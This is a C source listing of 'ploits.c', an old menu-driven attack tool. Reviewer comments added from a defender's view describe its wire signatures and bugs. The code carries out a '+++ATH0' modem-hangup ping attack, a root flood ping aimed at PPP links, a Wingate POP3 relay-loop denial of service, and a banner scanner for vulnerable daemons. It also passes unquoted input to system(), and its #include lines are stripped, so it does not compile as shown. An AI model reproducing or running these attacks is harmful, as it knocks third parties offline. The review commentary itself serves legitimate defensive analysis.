/* Name: ploits.c v1.95
 * Author: Cyber_Bob (Cyber_Bob@bak.rr.com)
 * Made: Code Crusader 2.1.4 (even l33ter scr1pt maker y0 ;)
 * Compiled: linux 2.2.16 i686 (slackware 7.1)
 *           gcc version 2.91.66
 *           gcc ploits.c (optional: -O# -ggdb -DDEBUG) -o ploits
 *
 * This is code for you ppl with cable modems that don't feel like
 * downloading stuff.c, ath0.c, or banner.c, etc. separately... Basically
 * this script has them all combined into one program. This program is
 * better managed than its previous version and has been made with error
 * checking software so it shouldn't be too sloppy or erroneous. I'm going
 * to update this more often from now on so look for updated versions.
 *
 * [Shoutz/IRC] #outlaw, #NukeZ, #twlc, and #assassins crew'z
 * [Shoutz/People] soulFate, n0th|ng, L^WaRrioR, VIRILATOR, anti-, WWsBabe,
 *                 DePhAzEr (Where the fuck have you been?!?!), trunck, f0x,
 *                 minner, Colly^, Phear, firebird1, sgxx (owned by ath0 :P),
 *                 everybody from #suid. and anybody I forgot (sorry =).
 */

/*
 * Review notes (reading this listing as a defender / code reviewer).
 *
 * Structure: a text menu in front of four routines. ath0() and stuff() only
 * build a /bin/ping command line and hand it to system(); loopmail() opens
 * one TCP connection to port 110 and writes to it; banner() walks an IP and
 * port range, connects, reads whatever the service sends first, and
 * substring-matches it against five product names.
 *
 * State of the listing: the ten #include lines below have lost their header
 * names and whitespace inside string literals appears collapsed, so the
 * file does not build as shown.
 *
 * Memory safety of the tool itself: every text prompt is an unbounded
 * scanf("%s") into a fixed-size stack array (host[100], tmp[920], ips[20],
 * ipe[20]), and banner() prints a 1000-byte buffer with %s after a read()
 * that may fill all 1000 bytes. Return values of scanf(), socket(),
 * inet_addr() and read() are not checked in several places (marked inline).
 *
 * What is visible on the wire, taken from the constants in the code:
 *   - ICMP echo requests padded with the repeating bytes
 *     2b 2b 2b 41 54 48 30 0d, i.e. ASCII "+++ATH0" followed by CR;
 *   - flood-rate ICMP echo requests, data size 100, padded with 7e 7d;
 *   - a POP3 (tcp/110) line carrying a long run of "@127.0.0.1";
 *   - sequential TCP connects across a port range, one every DELAY
 *     microseconds, with no request sent after connecting.
 * Mitigations are the generic ones (ICMP rate limiting / payload filtering
 * at the edge, patching the proxy); for the +++ATH0 case the commonly cited
 * modem-side fix was disabling the escape character via the S2 register --
 * confirm against the modem's own documentation.
 */

/* NOTE(review): header names are missing from all ten directives in this
 * listing (probably stripped together with the angle brackets). */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define VERSION "1.95"
#define DELAY 500000   /* microseconds passed to usleep() between ports in banner() */

/* File-scope state shared by the routines below. `sa` has static storage, so
 * it starts zeroed and keeps whatever the previous routine wrote into it. */
int sock,p1, p2, ctr2;            /* current socket; banner() port range and port cursor */
unsigned long start, end, ctr;    /* banner() address range and cursor (host byte order for ctr) */
struct sockaddr_in sa;
struct hostent *hp;

int menu(void);
void ath0(void);
void stuff(void);
void loopmail(void);
void banner(void);

/*
 * Prints the title and usage warnings, then loops forever dispatching on the
 * value returned by menu(). The only exit is choice 5 (exit(0)) or one of the
 * exit(1) calls inside the routines.
 */
int main(void)
{
    printf("\n\t\tPloits v%s by Cyber_Bob\n", VERSION);
    puts("\nNote: Don't use choice 2 if you have a PPP connection to");
    puts(" the internet or you will DoS yourself!!!!!!!!!!!!!\n");
    puts("Warning: Only type integers at the choice prompt!!\n\n");
    while(1) {
        switch(menu()) {
            case 1: {
                ath0();
                break;
            }
            case 2: {
                /* Requires uid 0 AND gid 0; presumably because flood ping
                 * (-f, used by stuff()) is restricted to root -- not shown here. */
                if(getuid() != 0 || getgid() != 0) {
                    fprintf(stderr,"\nNon-Fatal Error, you must be root for choice 2... returning to menu!\n");
                    break;
                }
                stuff();
                break;
            }
            case 3: {
                loopmail();
                break;
            }
            case 4: {
                banner();
                break;
            }
            case 5: {
                printf("\nThank you for using ploits.c!\n");
                exit(0);
            }
            /* Not reachable as written: menu() only returns values in 1..5. */
            default: {
                printf("\nNon-Fatal Error, choice not recognized... returning to menu!\n");
                break;
            }
        }
    }
    return 0;   /* unreachable: the loop above never terminates normally */
}

/*
 * Prints the five menu entries and reads an integer until it lies in 1..5.
 * Returns that integer.
 *
 * NOTE(review): the scanf() result is not checked and `reply` starts
 * uninitialized. On non-numeric input scanf() consumes nothing, so the loop
 * condition reads an indeterminate value and the same bad input is retried
 * on every pass -- which is why main() warns to "only type integers".
 */
int menu(void)
{
    int reply;
    do{
        puts("\n\n\n\n1\t-\t+++ATH0 Exploit");
        puts("2\t-\tPPP DoS Attack");
        puts("3\t-\tWingate 4.0.1 on Win98 DoS Attack");
        puts("4\t-\tBanner\\Security Scanner");
        puts("5\t-\tExit, return to prompt.");
        printf("\nChoice: ");
        scanf("%d", &reply);}
    while(reply < 1 || reply > 5);
    return reply;
}

/*
 * Menu choice 1. Prompts for a host name, checks that it resolves, appends
 * it to a fixed /bin/ping command line (-c 5, pad pattern
 * 2b2b2b415448300d) and runs the result through system().
 *
 * The pad pattern decodes to "+++ATH0" plus CR. Defensive relevance: echo
 * replies carry the payload back, so the indicator is this byte sequence in
 * ICMP echo data in either direction.
 */
void ath0(void)
{
    char command[256] = "/bin/ping -c 5 -p 2b2b2b415448300d ";
    char host[100];
    printf("\nEnter Hostname: ");
    /* NOTE(review): no field width -- input longer than 99 bytes overruns host[]. */
    scanf("%s", host);
    /* gethostbyname() reports failure through h_errno, not errno, so the
     * perror() text below may not describe the real cause. */
    if((hp=(struct hostent *)gethostbyname(host))==NULL) {
        perror("\nFATAL ERROR: failed to resolve host");
        exit(1);
    }
    /* The operator-supplied string is concatenated unquoted into a shell
     * command; the only filter is that it resolved above. */
    strcat(command, host);
    puts("\n\n\nNow sending 5 ICMP's containing the +++ATH0 string to...");
    printf("---------------------------------------------\n%s\n\n\n",host);
    system(command);
    puts("\n\n\n\nDone sending. If packet loss = 100%");
    puts("The target is dead, unless firewalled.\n");
}

/*
 * Menu choice 2 (main() only calls it when uid and gid are both 0). Same
 * shape as ath0(): prompt, resolve, append the host to a fixed /bin/ping
 * command line (-f, pad pattern 7e7d, -s 100) and run it with system().
 * The command is not bounded by a count, and the function says itself that
 * it only ends on CTRL+C.
 *
 * 0x7e and 0x7d are the flag and control-escape octets of PPP's HDLC-like
 * framing (RFC 1662); presumably that is why the menu labels this a PPP
 * DoS and why main() warns PPP users against running it.
 */
void stuff(void)
{
    char command[256] = "/bin/ping -f -p 7e7d -s 100 ";
    char host[100];
    printf("\nEnter Hostname: ");
    /* NOTE(review): unbounded read into host[100], here in a process running as root. */
    scanf("%s", host);
    /* See ath0(): failure is reported via h_errno, not errno. */
    if((hp=(struct hostent *)gethostbyname(host))==NULL) {
        perror("\nFATAL ERROR: failed to resolve host");
        exit(1);
    }
    /* Unquoted operator input reaches a root shell via system(). */
    strcat(command, host);
    puts("\n\n\nNow bombing the shit out of...");
    printf("---------------------------------------------\n%s\n\n\n",host);
    puts("Press CTRL +C to stop. (WARNING: Will not return to menu!)\n");
    system(command);
}

/*
 * Menu choice 3. Resolves a host, connects to TCP port 110 (POP3), reads one
 * whitespace-delimited token from the operator, appends the fixed tmp1
 * string (a run of "@127.0.0.1") to it, writes to the socket, sleeps 0.5 s
 * and writes the `pass` string. The socket is left open and `userloop` is
 * never freed when the function returns to the menu.
 *
 * NOTE(review), memory safety: tmp[] is 920 bytes, tmp1 is roughly 700, and
 * the scanf() into tmp has no width, so the strcat() can run past tmp[].
 * NOTE(review): both write() byte counts are sizeof applied to a char
 * pointer (userloop, pass), i.e. the pointer size.
 */
void loopmail(void)
{
    /* Line continuations restored; the listing shows them as "\ ". */
    char *tmp1=
"@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1\
@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1\
@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1\
@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1\
@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1\
@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1\
@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1\
@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1\
@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1\
@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1";
    char tmp[920], *userloop, *pass= "PASS whatever", host[100];
    if((userloop=(char *) malloc(1000 * sizeof(char))) == NULL) {
        fprintf(stderr,"\nFATAL ERROR: memory allocation error");
        exit(1);
    }
    printf("\nEnter Hostname: ");
    /* NOTE(review): unbounded read into host[100]. */
    scanf("%s", host);
    if((hp=(struct hostent *)gethostbyname(host)) == NULL) {
        perror("\nFATAL ERROR: failed to resolve host");
        exit(1);
    }
    if((sock=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
        perror("\nFATAL ERROR: could not open socket");
        exit(1);
    }
    sa.sin_family=AF_INET;
    sa.sin_port=htons(110);
    /* Copies h_length bytes from the resolver result without checking that
     * it matches sizeof(sa.sin_addr). */
    memcpy((char *)&sa.sin_addr, (char *)hp->h_addr,hp->h_length);
    if(connect(sock,(struct sockaddr *)&sa, sizeof(sa)) != 0) {
        perror("\nFATAL ERROR: could not connect to host");
        exit(1);
    }
    printf("Preparing to DoS wingate on \"%s\"... ", host);
    fflush(stdout);
    /* fflush() on an input stream is undefined by the C standard. */
    fflush(stdin);
    printf("Done.\n");
    printf("Enter valid \"USER username@forwardingPop3\": ");
    /* NOTE(review): unbounded read into tmp[920]. */
    scanf("%s", tmp);
    printf("\nConstructing/Sending relay loop strings. ");
    strcat(tmp, tmp1);
    strcpy(userloop, tmp);
    if((write(sock, userloop, sizeof(userloop))) == -1) {
        perror("\nFATAL ERROR: could not write to socket");
        exit(1);
    }
    usleep(500000);
    if((write(sock, pass, sizeof(pass))) == -1) {
        perror("\nFATAL ERROR: could not write to socket");
        exit(1);
    }
}

/*
 * Menu choice 4. Reads a start/end IPv4 address and a start/end port, then
 * for every address and port in the range: creates a TCP socket, connects,
 * reads up to 1000 bytes without sending anything, prints them as the
 * "banner", and reports the first of five product-name substrings found in
 * it. Sleeps DELAY microseconds between ports.
 *
 * Reading the output: a "possible security risk" line means only that a
 * product name appeared in the first bytes the service sent. No version is
 * compared, and banners are operator-configurable, so the result is neither
 * evidence of a vulnerability nor of its absence.
 *
 * NOTE(review):
 *  - scanf("%s") into ips[20]/ipe[20] is unbounded; inet_addr() failure is
 *    not checked.
 *  - socket() is unchecked and no socket is ever closed, so one descriptor
 *    is leaked per port probed.
 *  - read() is attempted even after connect() failed, and it blocks on any
 *    service that waits for the client to speak first.
 *  - if read() returns the full 1000 bytes, data[] has no terminator and the
 *    %s prints and strstr() calls read past the array.
 */
void banner(void)
{
    char ips[20], ipe[20],data[1000];
    int i=1;
    printf("\nEnter Start IP: ");
    scanf("%s", ips);
    printf("\nEnter End IP: ");
    scanf("%s", ipe);
    printf("\nEnter Start Port: ");
    scanf("%d", &p1);
    printf("\nEnter End Port: ");
    scanf("%d", &p2);
    puts("\nBeginning Scan...\n--------------------------------------\n");
    start = inet_addr(ips);
    end = inet_addr(ipe);
    for(ctr = ntohl(start);ctr <= ntohl(end);ctr++) {
        printf("Reading info for host #%d...\n\n",i++);
        /* Skip addresses whose last octet is 0 or 255. The checks run in this
         * order only once, so stepping off .255 lands on the following .0
         * unchecked, and ctr can move past `end` before the port loop runs. */
        if((ctr & 0xff) == 0) ctr++;
        if((ctr & 0xff) ==255) ctr++;
        for(ctr2 = p1;ctr2 <= p2;ctr2++) {
            sa.sin_family=AF_INET;
            sa.sin_port=htons(ctr2);
            sa.sin_addr.s_addr=htonl(ctr);
            sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
            /* Any connect() failure is reported as "refused"; execution then
             * continues into the read() below regardless. */
            if((connect(sock,(struct sockaddr *)&sa,sizeof(sa))) == -1) {
                puts(" Connection refused...");
            }
            fflush(stdin);   /* undefined behaviour on an input stream */
            memset(data,0,sizeof(data));
            read(sock,&data,1000);
            /* The service label is chosen from the port number alone. */
            if(ctr2 == 21) {
                printf(" Port: %d (FTPD)\nBanner: %s\n", ctr2, data);
            }
            else if(ctr2 == 23) {
                printf(" Port: %d (TELNETD)\nBanner: %s\n", ctr2, data);
            }
            else if(ctr2 == 79) {
                printf(" Port: %d (FINGERD)\nBanner: %s\n", ctr2, data);
            }
            else if(ctr2 == 80) {
                printf(" Port: %d (HTTPD)\nBanner: %s\n", ctr2, data);
            }
            else if(ctr2 == 113) {
                printf(" Port: %d (IDENTD)\nBanner: %s\n", ctr2, data);
            }
            else if(ctr2 == 1080) {
                printf(" Port: %d (PROXY)\nBanner: %s\n", ctr2, data);
            }
            else {
                printf("Port: %d\nBanner: %s\n", ctr2, data);
            }
            puts("\nChecking for possible insecure daemons...\n");
            /* Case-sensitive substring match; only the first hit in this
             * chain is reported. */
            if(strstr(data, "QPOP")!=NULL) {
                puts("QPop daemon found, possible security risk...");
            }
            else if(strstr(data, "wu-")!=NULL) {
                puts("WU-FTP daemon found, possible security risk...");
            }
            else if(strstr(data, "sendmail")!=NULL) {
                puts("Sendmail daemon found, possible security risk...");
            }
            else if(strstr(data, "ProFTPD")!=NULL) {
                puts("ProFTP daemon found, possible security risk...");
            }
            else if(strstr(data, "Wingate")!=NULL || strstr(data, "WinGate")!=NULL) {
                puts("Wingate daemon found, possible security risk...");
            }
            else {
                puts("None of the daemons checked for were found!");
            }
            puts("-----");
            usleep(DELAY);
        }
        puts("\n--------------------------------------");
    }
    puts("Finished!");
}